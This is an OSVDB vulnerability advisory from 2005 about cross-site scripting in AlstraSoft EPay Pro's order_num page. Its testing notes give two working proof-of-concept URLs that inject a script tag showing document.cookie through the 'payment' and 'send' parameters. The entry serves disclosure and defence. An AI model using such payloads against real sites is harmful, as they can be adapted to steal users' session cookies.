AlstraSoft EPay Pro order_num Multiple Variable XSS

2005-04-01T07:54:57
ID OSVDB:15228
Type osvdb
Reporter OSVDB
Modified 2005-04-01T07:54:57

Description

Manual Testing Notes

http://[victim]/epal/?order_num=crap&payment="><script>alert(document.cookie)</script>&send=first&send=regular&send=priority&send=express

http://[victim]/epal/?order_num=crap&payment=crap&send=first&send=regular&send=priority&send='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

References:

Vendor URL: http://www.alstrasoft.com/ Security Tracker: 1013627 Secunia Advisory ID:14802 Related OSVDB ID: 15227 Other Advisory URL: http://digitalparadox.org/advisories/aep.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0022.html